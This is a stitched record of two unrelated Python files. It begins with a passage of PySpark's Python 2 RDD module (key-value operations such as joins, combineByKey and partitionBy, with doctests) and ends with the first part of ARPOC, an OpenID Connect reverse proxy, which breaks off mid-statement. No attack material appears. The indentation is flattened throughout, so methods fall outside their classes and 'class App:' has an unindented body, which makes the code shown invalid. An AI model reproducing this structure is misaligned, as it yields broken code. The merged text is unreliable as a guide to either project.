        # Coerce every element to UTF-8 bytes (basestring/unicode: Python 2).
        for x in iterator:
            if not isinstance(x, basestring):
                x = unicode(x)
            yield x.encode("utf-8")
    keyed = PipelinedRDD(self, func)
    # Bypass the Python serializer: hand raw UTF-8 bytes to the Java side.
    keyed._bypass_serializer = True
    keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path)
# Pair functions
def collectAsMap(self):
    """
    Return the key-value pairs in this RDD to the master as a dictionary.

    Later pairs with a duplicate key overwrite earlier ones, as with any
    dict built from a sequence of pairs.

    >>> m = sc.parallelize([(1, 2), (3, 4)]).collectAsMap()
    >>> m[1]
    2
    >>> m[3]
    4
    """
    collected_pairs = self.collect()
    return dict(collected_pairs)
def keys(self):
    """
    Return an RDD with the keys of each tuple.

    >>> m = sc.parallelize([(1, 2), (3, 4)]).keys()
    >>> m.collect()
    [1, 3]
    """
    # NOTE: tuple-parameter lambdas are Python 2 only syntax.
    return self.map(lambda (k, v): k)
def values(self):
    """
    Return an RDD with the values of each tuple.

    >>> m = sc.parallelize([(1, 2), (3, 4)]).values()
    >>> m.collect()
    [2, 4]
    """
    # NOTE: tuple-parameter lambdas are Python 2 only syntax.
    return self.map(lambda (k, v): v)
def reduceByKey(self, func, numPartitions=None):
    """
    Merge the values for each key using an associative reduce function.

    This will also perform the merging locally on each mapper before
    sending results to a reducer, similarly to a "combiner" in MapReduce.
    Output will be hash-partitioned with C{numPartitions} partitions, or
    the default parallelism level if C{numPartitions} is not specified.

    >>> from operator import add
    >>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
    >>> sorted(rdd.reduceByKey(add).collect())
    [('a', 2), ('b', 1)]
    """
    # reduceByKey is combineByKey where a lone value is already a valid
    # combined value, and both merge steps are the user's reduce function.
    def identity(value):
        return value
    return self.combineByKey(identity, func, func, numPartitions)
def reduceByKeyLocally(self, func):
    """
    Merge the values for each key using an associative reduce function, but
    return the results immediately to the master as a dictionary.

    This will also perform the merging locally on each mapper before
    sending results to a reducer, similarly to a "combiner" in MapReduce.

    >>> from operator import add
    >>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
    >>> sorted(rdd.reduceByKeyLocally(add).items())
    [('a', 2), ('b', 1)]
    """
    def reducePartition(iterator):
        # Reduce one partition into a single dict of partial results.
        m = {}
        for (k, v) in iterator:
            m[k] = v if k not in m else func(m[k], v)
        yield m
    def mergeMaps(m1, m2):
        # Fold the per-partition dicts together; mutates and returns m1.
        # NOTE: dict.iteritems is Python 2 only (module predates Py3).
        for (k, v) in m2.iteritems():
            m1[k] = v if k not in m1 else func(m1[k], v)
        return m1
    return self.mapPartitions(reducePartition).reduce(mergeMaps)
def countByKey(self):
    """
    Count the number of elements for each key, and return the result to the
    master as a dictionary.

    >>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
    >>> sorted(rdd.countByKey().items())
    [('a', 2), ('b', 1)]
    """
    # Project each pair down to its key, then count occurrences.
    keys_only = self.map(lambda pair: pair[0])
    return keys_only.countByValue()
def join(self, other, numPartitions=None):
    """
    Return an RDD containing all pairs of elements with matching keys in
    C{self} and C{other}.

    Each pair of elements will be returned as a (k, (v1, v2)) tuple, where
    (k, v1) is in C{self} and (k, v2) is in C{other}.

    Performs a hash join across the cluster.

    >>> x = sc.parallelize([("a", 1), ("b", 4)])
    >>> y = sc.parallelize([("a", 2), ("a", 3)])
    >>> sorted(x.join(y).collect())
    [('a', (1, 2)), ('a', (1, 3))]
    """
    # Delegates to the join helper imported elsewhere in this module.
    return python_join(self, other, numPartitions)
def leftOuterJoin(self, other, numPartitions=None):
    """
    Perform a left outer join of C{self} and C{other}.

    For each element (k, v) in C{self}, the resulting RDD will either
    contain all pairs (k, (v, w)) for w in C{other}, or the pair
    (k, (v, None)) if no elements in other have key k.

    Hash-partitions the resulting RDD into the given number of partitions.

    >>> x = sc.parallelize([("a", 1), ("b", 4)])
    >>> y = sc.parallelize([("a", 2)])
    >>> sorted(x.leftOuterJoin(y).collect())
    [('a', (1, 2)), ('b', (4, None))]
    """
    # Delegates to the join helper imported elsewhere in this module.
    return python_left_outer_join(self, other, numPartitions)
def rightOuterJoin(self, other, numPartitions=None):
    """
    Perform a right outer join of C{self} and C{other}.

    For each element (k, w) in C{other}, the resulting RDD will either
    contain all pairs (k, (v, w)) for v in this, or the pair (k, (None, w))
    if no elements in C{self} have key k.

    Hash-partitions the resulting RDD into the given number of partitions.

    >>> x = sc.parallelize([("a", 1), ("b", 4)])
    >>> y = sc.parallelize([("a", 2)])
    >>> sorted(y.rightOuterJoin(x).collect())
    [('a', (2, 1)), ('b', (None, 4))]
    """
    # Delegates to the join helper imported elsewhere in this module.
    return python_right_outer_join(self, other, numPartitions)
# TODO: add option to control map-side combining
def partitionBy(self, numPartitions, partitionFunc=None):
    """
    Return a copy of the RDD partitioned using the specified partitioner.

    >>> pairs = sc.parallelize([1, 2, 3, 4, 2, 4, 1]).map(lambda x: (x, x))
    >>> sets = pairs.partitionBy(2).glom().collect()
    >>> set(sets[0]).intersection(set(sets[1]))
    set([])
    """
    if numPartitions is None:
        numPartitions = self.ctx.defaultParallelism
    if partitionFunc is None:
        # Default partitioner: hash of the key, with None keys pinned to
        # partition 0 (presumably because None must partition
        # deterministically -- TODO confirm).
        partitionFunc = lambda x: 0 if x is None else hash(x)
    # Transferring O(n) objects to Java is too expensive. Instead, we'll
    # form the hash buckets in Python, transferring O(numPartitions) objects
    # to Java. Each object is a (splitNumber, [objects]) pair.
    outputSerializer = self.ctx._unbatched_serializer
    def add_shuffle_key(split, iterator):
        # NOTE: dict.iteritems is Python 2 only (module predates Py3).
        buckets = defaultdict(list)
        for (k, v) in iterator:
            buckets[partitionFunc(k) % numPartitions].append((k, v))
        for (split, items) in buckets.iteritems():
            # Emit the partition id followed by the serialized bucket as
            # two consecutive records for the JVM side to pair up.
            yield pack_long(split)
            yield outputSerializer.dumps(items)
    keyed = PipelinedRDD(self, add_shuffle_key)
    keyed._bypass_serializer = True
    with _JavaStackTrace(self.context) as st:
        pairRDD = self.ctx._jvm.PairwiseRDD(keyed._jrdd.rdd()).asJavaPairRDD()
        partitioner = self.ctx._jvm.PythonPartitioner(numPartitions,
                                                      id(partitionFunc))
        jrdd = pairRDD.partitionBy(partitioner).values()
    rdd = RDD(jrdd, self.ctx, BatchedSerializer(outputSerializer))
    # This is required so that id(partitionFunc) remains unique, even if
    # partitionFunc is a lambda:
    rdd._partitionFunc = partitionFunc
    return rdd
# TODO: add control over map-side aggregation
def combineByKey(self, createCombiner, mergeValue, mergeCombiners,
                 numPartitions=None):
    """
    Generic function to combine the elements for each key using a custom
    set of aggregation functions.

    Turns an RDD[(K, V)] into a result of type RDD[(K, C)], for a "combined
    type" C. Note that V and C can be different -- for example, one might
    group an RDD of type (Int, Int) into an RDD of type (Int, List[Int]).

    Users provide three functions:

        - C{createCombiner}, which turns a V into a C (e.g., creates
          a one-element list)
        - C{mergeValue}, to merge a V into a C (e.g., adds it to the end of
          a list)
        - C{mergeCombiners}, to combine two C's into a single one.

    In addition, users can control the partitioning of the output RDD.

    >>> x = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
    >>> def f(x): return x
    >>> def add(a, b): return a + str(b)
    >>> sorted(x.combineByKey(str, add, add).collect())
    [('a', '11'), ('b', '1')]
    """
    if numPartitions is None:
        numPartitions = self.ctx.defaultParallelism
    def combineLocally(iterator):
        # Map-side combine: fold one partition into a key -> combiner dict.
        combiners = {}
        for x in iterator:
            (k, v) = x
            if k not in combiners:
                combiners[k] = createCombiner(v)
            else:
                combiners[k] = mergeValue(combiners[k], v)
        # NOTE: dict.iteritems is Python 2 only (module predates Py3).
        return combiners.iteritems()
    locally_combined = self.mapPartitions(combineLocally)
    shuffled = locally_combined.partitionBy(numPartitions)
    def _mergeCombiners(iterator):
        # Reduce side: merge combiners arriving from different mappers.
        combiners = {}
        for (k, v) in iterator:
            if not k in combiners:
                combiners[k] = v
            else:
                combiners[k] = mergeCombiners(combiners[k], v)
        return combiners.iteritems()
    return shuffled.mapPartitions(_mergeCombiners)
def foldByKey(self, zeroValue, func, numPartitions=None):
    """
    Merge the values for each key using an associative function "func" and a neutral "zeroValue"
    which may be added to the result an arbitrary number of times, and must not change
    the result (e.g., 0 for addition, or 1 for multiplication.).

    NOTE(review): every fold starts from the *same* zeroValue object; if
    func mutates its first argument and zeroValue is mutable, state leaks
    between keys -- confirm callers only pass immutable zero values.

    >>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
    >>> from operator import add
    >>> rdd.foldByKey(0, add).collect()
    [('a', 2), ('b', 1)]
    """
    return self.combineByKey(lambda v: func(zeroValue, v), func, func, numPartitions)
# TODO: support variant with custom partitioner
def groupByKey(self, numPartitions=None):
    """
    Group the values for each key in the RDD into a single sequence.
    Hash-partitions the resulting RDD into numPartitions partitions.

    Note: If you are grouping in order to perform an aggregation (such as a
    sum or average) over each key, using reduceByKey will provide much better
    performance.

    >>> x = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
    >>> map((lambda (x,y): (x, list(y))), sorted(x.groupByKey().collect()))
    [('a', [1, 1]), ('b', [1])]
    """
    def createCombiner(x):
        # A lone value starts a one-element list.
        return [x]
    def mergeValue(xs, x):
        xs.append(x)
        return xs
    def mergeCombiners(a, b):
        return a + b
    return self.combineByKey(createCombiner, mergeValue, mergeCombiners,
                             numPartitions).mapValues(lambda x: ResultIterable(x))
# TODO: add tests
def flatMapValues(self, f):
    """
    Pass each value in the key-value pair RDD through a flatMap function
    without changing the keys; this also retains the original RDD's
    partitioning.

    >>> x = sc.parallelize([("a", ["x", "y", "z"]), ("b", ["p", "r"])])
    >>> def f(x): return x
    >>> x.flatMapValues(f).collect()
    [('a', 'x'), ('a', 'y'), ('a', 'z'), ('b', 'p'), ('b', 'r')]
    """
    # NOTE: tuple-parameter lambdas are Python 2 only syntax.
    flat_map_fn = lambda (k, v): ((k, x) for x in f(v))
    return self.flatMap(flat_map_fn, preservesPartitioning=True)
def mapValues(self, f):
    """
    Pass each value in the key-value pair RDD through a map function
    without changing the keys; this also retains the original RDD's
    partitioning.

    >>> x = sc.parallelize([("a", ["apple", "banana", "lemon"]), ("b", ["grapes"])])
    >>> def f(x): return len(x)
    >>> x.mapValues(f).collect()
    [('a', 3), ('b', 1)]
    """
    # NOTE: tuple-parameter lambdas are Python 2 only syntax.
    map_values_fn = lambda (k, v): (k, f(v))
    return self.map(map_values_fn, preservesPartitioning=True)
# TODO: support varargs cogroup of several RDDs.
def groupWith(self, other):
    """
    Alias for cogroup.
    """
    return self.cogroup(other)
# TODO: add variant with custom parittioner
def cogroup(self, other, numPartitions=None):
    """
    For each key k in C{self} or C{other}, return a resulting RDD that
    contains a tuple with the list of values for that key in C{self} as well
    as C{other}.

    >>> x = sc.parallelize([("a", 1), ("b", 4)])
    >>> y = sc.parallelize([("a", 2)])
    >>> map((lambda (x,y): (x, (list(y[0]), list(y[1])))), sorted(list(x.cogroup(y).collect())))
    [('a', ([1], [2])), ('b', ([4], []))]
    """
    # Delegates to the cogroup helper imported elsewhere in this module.
    return python_cogroup(self, other, numPartitions)
def subtractByKey(self, other, numPartitions=None):
    """
    Return each (key, value) pair in C{self} that has no pair with matching key
    in C{other}.

    >>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 2)])
    >>> y = sc.parallelize([("a", 3), ("c", None)])
    >>> sorted(x.subtractByKey(y).collect())
    [('b', 4), ('b', 5)]
    """
    # After cogroup, vals is (values_in_self, values_in_other): keep keys
    # present on the left but absent on the right, then re-emit the left
    # values. NOTE: tuple-parameter lambdas are Python 2 only syntax.
    filter_func = lambda (key, vals): len(vals[0]) > 0 and len(vals[1]) == 0
    map_func = lambda (key, vals): [(key, val) for val in vals[0]]
    return self.cogroup(other, numPartitions).filter(filter_func).flatMap(map_func)
def subtract(self, other, numPartitions=None):
    """
    Return each value in C{self} that is not contained in C{other}.

    :param numPartitions: number of partitions for the intermediate
        subtractByKey. Bug fix: previously this argument was accepted
        but silently dropped.

    >>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 3)])
    >>> y = sc.parallelize([("a", 3), ("c", None)])
    >>> sorted(x.subtract(y).collect())
    [('a', 1), ('b', 4), ('b', 5)]
    """
    # Tag each element as an (element, placeholder) pair so that set
    # difference can be expressed as subtractByKey on the elements.
    rdd = other.map(lambda x: (x, True))
    return self.map(lambda x: (x, True)) \
        .subtractByKey(rdd, numPartitions) \
        .map(lambda tpl: tpl[0])
def keyBy(self, f):
    """
    Creates tuples of the elements in this RDD by applying C{f}.

    >>> x = sc.parallelize(range(0,3)).keyBy(lambda x: x*x)
    >>> y = sc.parallelize(zip(range(0,5), range(0,5)))
    >>> map((lambda (x,y): (x, (list(y[0]), (list(y[1]))))), sorted(x.cogroup(y).collect()))
    [(0, ([0], [0])), (1, ([1], [1])), (2, ([], [2])), (3, ([], [3])), (4, ([2], [4]))]
    """
    # Each element becomes (f(element), element).
    def pair_with_key(element):
        return (f(element), element)
    return self.map(pair_with_key)
def repartition(self, numPartitions):
    """
    Return a new RDD that has exactly numPartitions partitions.

    Can increase or decrease the level of parallelism in this RDD. Internally, this uses
    a shuffle to redistribute data.
    If you are decreasing the number of partitions in this RDD, consider using `coalesce`,
    which can avoid performing a shuffle.

    >>> rdd = sc.parallelize([1,2,3,4,5,6,7], 4)
    >>> sorted(rdd.glom().collect())
    [[1], [2, 3], [4, 5], [6, 7]]
    >>> len(rdd.repartition(2).glom().collect())
    2
    >>> len(rdd.repartition(10).glom().collect())
    10
    """
    # Delegate to the JVM RDD; the Python-side deserializer is unchanged.
    jrdd = self._jrdd.repartition(numPartitions)
    return RDD(jrdd, self.ctx, self._jrdd_deserializer)
def coalesce(self, numPartitions, shuffle=False):
    """
    Return a new RDD that is reduced into `numPartitions` partitions.

    :param shuffle: whether a shuffle may be performed while coalescing.
        Bug fix: previously this flag was accepted but never forwarded to
        the JVM, so C{coalesce(n, shuffle=True)} silently behaved like
        C{coalesce(n)}.

    >>> sc.parallelize([1, 2, 3, 4, 5], 3).glom().collect()
    [[1], [2, 3], [4, 5]]
    >>> sc.parallelize([1, 2, 3, 4, 5], 3).coalesce(1).glom().collect()
    [[1, 2, 3, 4, 5]]
    """
    # Forward the shuffle flag to the Java-side coalesce overload.
    jrdd = self._jrdd.coalesce(numPartitions, shuffle)
    return RDD(jrdd, self.ctx, self._jrdd_deserializer)
def zip(self, other):
    """
    Zips this RDD with another one, returning key-value pairs: the first
    element of each RDD paired together, the second element of each RDD
    paired together, etc. Assumes that the two RDDs have the same number of
    partitions and the same number of elements in each partition (e.g. one
    was made through a map on the other).

    >>> x = sc.parallelize(range(0,5))
    >>> y = sc.parallelize(range(1000, 1005))
    >>> x.zip(y).collect()
    [(0, 1000), (1, 1001), (2, 1002), (3, 1003), (4, 1004)]
    """
    pairRDD = self._jrdd.zip(other._jrdd)
    # Each side keeps its own deserializer for its half of the pair.
    deserializer = PairDeserializer(self._jrdd_deserializer,
                                    other._jrdd_deserializer)
    return RDD(pairRDD, self.ctx, deserializer)
def name(self):
    """
    Return the name of this RDD as a UTF-8 encoded string, or None when
    no name has been assigned.
    """
    assigned = self._jrdd.name()
    if assigned:
        return assigned.encode('utf-8')
    return None
def setName(self, name):
    """
    Assign a name to this RDD.

    >>> rdd1 = sc.parallelize([1,2])
    >>> rdd1.setName('RDD1')
    >>> rdd1.name()
    'RDD1'
    """
    # The name lives on the JVM RDD, so it survives serialization of the
    # Python wrapper.
    self._jrdd.setName(name)
def toDebugString(self):
    """
    A description of this RDD and its recursive dependencies for debugging,
    UTF-8 encoded; None when the JVM returns an empty description.
    """
    description = self._jrdd.toDebugString()
    if description:
        return description.encode('utf-8')
    return None
def getStorageLevel(self):
    """
    Get the RDD's current storage level.

    >>> rdd1 = sc.parallelize([1,2])
    >>> rdd1.getStorageLevel()
    StorageLevel(False, False, False, False, 1)
    """
    # Translate the JVM StorageLevel object field-by-field into the
    # Python-side StorageLevel wrapper.
    java_storage_level = self._jrdd.getStorageLevel()
    storage_level = StorageLevel(java_storage_level.useDisk(),
                                 java_storage_level.useMemory(),
                                 java_storage_level.useOffHeap(),
                                 java_storage_level.deserialized(),
                                 java_storage_level.replication())
    return storage_level
# TODO: `lookup` is disabled because we can't make direct comparisons based
# on the key; we need to compare the hash of the key to the hash of the
# keys in the pairs. This could be an expensive operation, since those
# hashes aren't retained.
class PipelinedRDD(RDD):
    """
    An RDD whose Python map/flatMap/filter functions are fused ("pipelined")
    with its parent's, so a chain of narrow transformations runs in a single
    pass over each partition.

    Pipelined maps:
    >>> rdd = sc.parallelize([1, 2, 3, 4])
    >>> rdd.map(lambda x: 2 * x).cache().map(lambda x: 2 * x).collect()
    [4, 8, 12, 16]
    >>> rdd.map(lambda x: 2 * x).map(lambda x: 2 * x).collect()
    [4, 8, 12, 16]

    Pipelined reduces:
    >>> from operator import add
    >>> rdd.map(lambda x: 2 * x).reduce(add)
    20
    >>> rdd.flatMap(lambda x: [x, x]).reduce(add)
    20
    """
    def __init__(self, prev, func, preservesPartitioning=False):
        if not isinstance(prev, PipelinedRDD) or not prev._is_pipelinable():
            # This transformation is the first in its stage:
            self.func = func
            self.preservesPartitioning = preservesPartitioning
            self._prev_jrdd = prev._jrdd
            self._prev_jrdd_deserializer = prev._jrdd_deserializer
        else:
            prev_func = prev.func
            def pipeline_func(split, iterator):
                # Compose the parent's function with ours so both run in
                # one pass over the partition.
                return func(split, prev_func(split, iterator))
            self.func = pipeline_func
            self.preservesPartitioning = \
                prev.preservesPartitioning and preservesPartitioning
            self._prev_jrdd = prev._prev_jrdd  # maintain the pipeline
            self._prev_jrdd_deserializer = prev._prev_jrdd_deserializer
        self.is_cached = False
        self.is_checkpointed = False
        self.ctx = prev.ctx
        self.prev = prev
        # Cache slot for the lazily-built Java RDD (see _jrdd below).
        self._jrdd_val = None
        self._jrdd_deserializer = self.ctx.serializer
        self._bypass_serializer = False

    @property
    def _jrdd(self):
        # Lazily build (and cache) the Java-side PythonRDD that executes
        # this pipeline's fused function.
        if self._jrdd_val:
            return self._jrdd_val
        if self._bypass_serializer:
            serializer = NoOpSerializer()
        else:
            serializer = self.ctx.serializer
        # The worker-side command: (function, input deserializer, output
        # serializer), shipped to executors via cloudpickle.
        command = (self.func, self._prev_jrdd_deserializer, serializer)
        pickled_command = CloudPickleSerializer().dumps(command)
        broadcast_vars = ListConverter().convert(
            [x._jbroadcast for x in self.ctx._pickled_broadcast_vars],
            self.ctx._gateway._gateway_client)
        self.ctx._pickled_broadcast_vars.clear()
        class_tag = self._prev_jrdd.classTag()
        env = MapConverter().convert(self.ctx.environment,
                                     self.ctx._gateway._gateway_client)
        includes = ListConverter().convert(self.ctx._python_includes,
                                           self.ctx._gateway._gateway_client)
        python_rdd = self.ctx._jvm.PythonRDD(self._prev_jrdd.rdd(),
            bytearray(pickled_command), env, includes, self.preservesPartitioning,
            self.ctx.pythonExec, broadcast_vars, self.ctx._javaAccumulator,
            class_tag)
        self._jrdd_val = python_rdd.asJavaRDD()
        return self._jrdd_val

    def _is_pipelinable(self):
        # Caching/checkpointing materializes this RDD, so later
        # transformations must not be fused into the same stage.
        return not (self.is_cached or self.is_checkpointed)
def _test():
    """Run this module's doctests against a local 4-thread SparkContext."""
    import doctest
    from pyspark.context import SparkContext
    globs = globals().copy()
    # The small batch size here ensures that we see multiple batches,
    # even in these small test examples:
    globs['sc'] = SparkContext('local[4]', 'PythonTest', batchSize=2)
    (failure_count, test_count) = doctest.testmod(globs=globs,optionflags=doctest.ELLIPSIS)
    globs['sc'].stop()
    if failure_count:
        exit(-1)

if __name__ == "__main__":
    _test()
|
__init__.py | """ Main module of the ARPOC """
# Python imports
import logging
import logging.config
import warnings
import copy
import argparse
# For scheduling auth & registration to providers
import sched
import threading
import time
import importlib.resources
import os
import pwd
import grp
import hashlib
import urllib.parse
from http.client import HTTPConnection
#HTTPConnection.debuglevel = 1
from dataclasses import dataclass, field
from typing import List, Dict, Union, Tuple, Callable, Iterable, Optional, Any
# side packages
##oic
import oic.oic
from oic.utils.authn.client import CLIENT_AUTHN_METHOD
from oic.oic.message import RegistrationResponse, AuthorizationResponse
from oic import rndstr
from oic.utils.http_util import Redirect
import oic.extension.client
import oic.exception
import yaml
import requests
import cherrypy
from cherrypy._cpdispatch import Dispatcher
from cherrypy.process.plugins import DropPrivileges, Daemonizer, PIDFile
from jinja2 import Environment, FileSystemLoader
from jwkest import jwt
#### Own Imports
from arpoc.base import ServiceProxy, OidcHandler, TLSOnlyDispatcher
import arpoc.ac as ac
import arpoc.exceptions
import arpoc.config as config
import arpoc.pap
import arpoc.special_pages
import arpoc.cache
import arpoc.utils
from arpoc.plugins import EnvironmentDict, ObjectDict, ObligationsDict
#logging.basicConfig(level=logging.DEBUG)
# Module-level logger for this package.
LOGGING = logging.getLogger(__name__)
# Jinja2 environment rooted at the package's bundled HTML templates.
env = Environment(loader=FileSystemLoader(
    os.path.join(os.path.dirname(__file__), 'resources', 'templates')))
class App:
""" Class for application handling.
Reads configuration files,
setups the oidc client classes
and the dispatcher for the services"""
def __init__(self) -> None:
    # Scheduler (and the thread that will run it) used to retry provider
    # registration/authentication in the background; the thread is started
    # later in setup_oidc_provider().
    self._scheduler = sched.scheduler(time.time, time.sleep)
    self.thread = threading.Thread(target=self._scheduler.run)
    # Declared here, assigned later in run().
    self.oidc_handler: OidcHandler
    self.config: config.OIDCProxyConfig
    # Target uid/gid for privilege dropping; filled in create_secrets_dir().
    self.uid = 0
    self.gid = 0
def cancel_scheduler(self):
    """ Cancels every event in the scheduler queue and waits for the
    scheduler thread to finish.

    Bug fix: thread.join() on a thread that was never started raises
    RuntimeError (the thread is only started in setup_oidc_provider(),
    which may not have run when the engine stops early); the join is
    now guarded with is_alive()."""
    if not self._scheduler.empty():
        for event in self._scheduler.queue:
            self._scheduler.cancel(event)
    if self.thread.is_alive():
        self.thread.join()
def setup_loggers(self) -> None:
    """ Read the loggers configuration and configure the loggers"""
    # The bundled loggers.yml is a template: substitute the configured
    # level and log-file paths before handing it to logging.config.
    with importlib.resources.path(
            'arpoc.resources',
            'loggers.yml') as loggers_path, open(loggers_path) as ymlfile:
        log_config_str = ymlfile.read()
    log_config_str = log_config_str.replace('DEFAULTLEVEL',
                                            self.config.misc.log_level)
    log_config_str = log_config_str.replace(
        'ACCESS_LOG', self.config.misc.access_log)
    log_config_str = log_config_str.replace('ERROR_LOG',
                                            self.config.misc.error_log)
    log_conf = yaml.safe_load(log_config_str)
    logging.config.dictConfig(log_conf)
def retry(self,
          function: Callable,
          exceptions: Tuple,
          *args: Any,
          retries: int = 5,
          retry_delay: int = 30) -> None:
    """ Retries function <retries> times, as long as <exceptions> are thrown.

    The retry is not immediate: a re-invocation with a decremented budget
    is scheduled on the app's scheduler after retry_delay seconds.

    NOTE(review): when the retry budget is exhausted the exception is
    swallowed silently -- presumably intentional best-effort behavior,
    but consider logging at error level; confirm before changing.
    """
    try:
        function(*args)
    except exceptions as excep:
        if retries > 0:
            LOGGING.debug(
                "Retrying %s, parameters %s, failed with exception %s",
                function, args,
                type(excep).__name__)
            LOGGING.debug("Delaying for %s seconds", retry_delay)
            self._scheduler.enter(retry_delay,
                                  1,
                                  self.retry,
                                  (function, exceptions, *args),
                                  kwargs={
                                      'retries': retries - 1,
                                      'retry_delay': retry_delay
                                  })
def tls_redirect(self, *args: Any, **kwargs: Any) -> None:
    """Redirect the current request to the TLS base URI, preserving the
    request path and query string.

    Bug fix: the old code located the path with
    url.index('/', len('http://')), which assumed a 7-character scheme
    prefix and mis-split URLs with any other scheme (e.g. 'https://');
    anchor the search on the actual '://' separator instead.
    """
    url = cherrypy.url(qs=cherrypy.request.query_string)
    # First '/' after the authority marks the start of the path; +1 drops
    # that slash so the path can be appended to the configured base URI.
    index = url.index('/', url.index('://') + 3) + 1
    path = url[index:]
    https_url = "{}{}".format(self.config.proxy.baseuri, path)
    raise cherrypy.HTTPRedirect(https_url)
def get_routes_dispatcher(self) -> cherrypy.dispatch.RoutesDispatcher:
    """ Setups the CherryPy dispatcher.

    This connects the proxied services, the OIDC redirect URIs, the auth
    endpoint and (optionally) the TLS-redirect wrapper, making them all
    reachable through CherryPy routing."""
    dispatcher = cherrypy.dispatch.RoutesDispatcher()
    # Connect the Proxied Services
    for name, service_cfg in self.config.services.items():
        logging.debug(service_cfg)
        if service_cfg.origin_URL == "pap":
            # Built-in policy administration point instead of a proxied app.
            pap = arpoc.pap.PolicyAdministrationPoint('pap', self.oidc_handler, service_cfg)
            # Two routes: the bare proxy URL and everything below it.
            dispatcher.connect('pap', service_cfg.proxy_URL, controller=pap, action='index')
            dispatcher.connect('pap', service_cfg.proxy_URL + "{_:/.*?}", controller=pap, action='index')
        elif service_cfg.origin_URL == "userinfo":
            # Built-in page showing the logged-in user's claims.
            userinfo_page = arpoc.special_pages.Userinfo('userinfo', self.oidc_handler, service_cfg)
            dispatcher.connect('userinfo', service_cfg.proxy_URL, controller=userinfo_page, action='index')
        else:
            # Ordinary reverse-proxied upstream service.
            service_proxy_obj = ServiceProxy(name, self.oidc_handler,
                                             service_cfg)
            dispatcher.connect(name,
                               service_cfg['proxy_URL'],
                               controller=service_proxy_obj,
                               action='index')
            dispatcher.connect(name,
                               service_cfg['proxy_URL'] + "{_:/.*?}",
                               controller=service_proxy_obj,
                               action='index')
    # Connect the Redirect URI
    LOGGING.debug(self.config.proxy['redirect'])
    for i in self.config.proxy['redirect']:
        dispatcher.connect('redirect',
                           i,
                           controller=self.oidc_handler,
                           action='redirect')
    # Test auth required
    dispatcher.connect('auth',
                       "%s" % self.config.proxy.auth,
                       controller=self.oidc_handler,
                       action='auth')
    dispatcher.connect('auth',
                       "%s/{name:.*?}" % self.config.proxy.auth,
                       controller=self.oidc_handler,
                       action='auth')
    if self.config.proxy['https_only']:
        # Wrap the dispatcher so plain-HTTP requests are TLS-redirected.
        dispatcher.connect('TLSRedirect',
                           '%s/{url:.*?}' % self.config.proxy.tls_redirect,
                           controller=self,
                           action='tls_redirect')
        tls_dispatcher = TLSOnlyDispatcher(self.config.proxy.tls_redirect,
                                           dispatcher)
        return tls_dispatcher
    return dispatcher
@staticmethod
def read_secrets(filepath: str) -> Dict:
    """ Reads the secrets file from the filepath.

    Returns an empty dict when the file is missing or empty. """
    try:
        with open(filepath, 'r') as ymlfile:
            loaded = yaml.safe_load(ymlfile)
    except FileNotFoundError:
        loaded = None
    return loaded if loaded is not None else dict()
def save_secrets(self) -> None:
    """ Saves the oidc rp secrets into the secrets file"""
    # Overwrites the file with the handler's current client secrets.
    with open(self.config.proxy['secrets'], 'w') as ymlfile:
        yaml.safe_dump(self.oidc_handler.get_secrets(), ymlfile)
def create_secrets_dir(self) -> None:
    """Create the secrets directory and hand its ownership to the
    configured service user/group so it stays writable after the
    privilege drop."""
    assert isinstance(self.config.proxy, config.ProxyConfig)
    secrets_dir = os.path.dirname(self.config.proxy['secrets'])
    os.makedirs(secrets_dir, exist_ok=True)
    self.uid = pwd.getpwnam(self.config.proxy['username'])[2]
    self.gid = grp.getgrnam(self.config.proxy['groupname'])[2]
    for dirpath, _, filenames in os.walk(secrets_dir):
        # NOTE(review): '> 1' tolerates exactly one file per directory --
        # presumably the secrets file itself; confirm intent.
        if len(filenames) > 1:
            raise arpoc.exceptions.ConfigError(
                "Please specify an own directory for oidproxy secrets")
        os.chown(dirpath, self.uid, self.gid)
        for filename in filenames:
            os.chown(os.path.join(dirpath, filename), self.uid, self.gid)
def setup_oidc_provider(self) -> None:
    """Setup the connection to all oidc providers in the config """
    assert isinstance(self.config, config.OIDCProxyConfig)
    # Read secrets
    secrets = self.read_secrets(self.config.proxy['secrets'])
    self.oidc_handler._secrets = secrets
    for name, provider in self.config.openid_providers.items():
        # check if the client is/was already registered
        if name in secrets.keys():
            self.retry(self.oidc_handler.create_client_from_secrets,
                       (requests.exceptions.RequestException,
                        oic.exception.CommunicationError), name, provider)
        else:
            self.retry(self.oidc_handler.register_first_time,
                       (requests.exceptions.RequestException,
                        oic.exception.CommunicationError), name, provider)
    # Start the scheduler thread that performs any delayed retries
    # queued by self.retry above.
    self.thread.start()
def run(self) -> None:
    """ Starts the application.

    Parses the command line, loads the configuration, and then either
    performs a one-shot administrative action (print sample config/AC,
    register a provider, check access-control rules) or boots the
    CherryPy proxy servers. """
    #### Command Line Argument Parsing
    parser = argparse.ArgumentParser(description='ARPOC')
    parser.add_argument('-c', '--config-file')
    parser.add_argument('--print-sample-config', action='store_true')
    parser.add_argument('--print-sample-ac', action='store_true')
    parser.add_argument('--add-provider')
    parser.add_argument('--client-id')
    parser.add_argument('--client-secret')
    parser.add_argument('-d', '--daemonize', action='store_true')
    parser.add_argument('--check-ac', action='store_true')
    args = parser.parse_args()

    config.cfg = config.OIDCProxyConfig(config_file=args.config_file)
    self.config = config.cfg
    assert self.config.proxy is not None
    #### Read Configuration
    if args.print_sample_config:
        config.cfg.print_sample_config()
        return
    if args.print_sample_ac:
        arpoc.ac.print_sample_ac()
        return
    self.setup_loggers()
    #### Create secrets dir and change ownership (perm)
    self.create_secrets_dir()
    self.oidc_handler = OidcHandler(self.config)

    if args.add_provider and args.client_id and args.client_secret:
        # One-shot mode: register a statically-configured client and exit.
        # read secrets
        secrets = self.read_secrets(self.config.proxy['secrets'])
        provider_cfg = self.config.openid_providers[args.add_provider]
        redirect_uris = provider_cfg.redirect_uris or self.config.proxy['redirect_uris']
        # add secrets
        # Bug fix: this previously read args.redirect_uris, an attribute
        # the parser never defines (there is no --redirect-uris option),
        # raising AttributeError; use the value computed above instead.
        secret_dict = {
            "client_id": args.client_id,
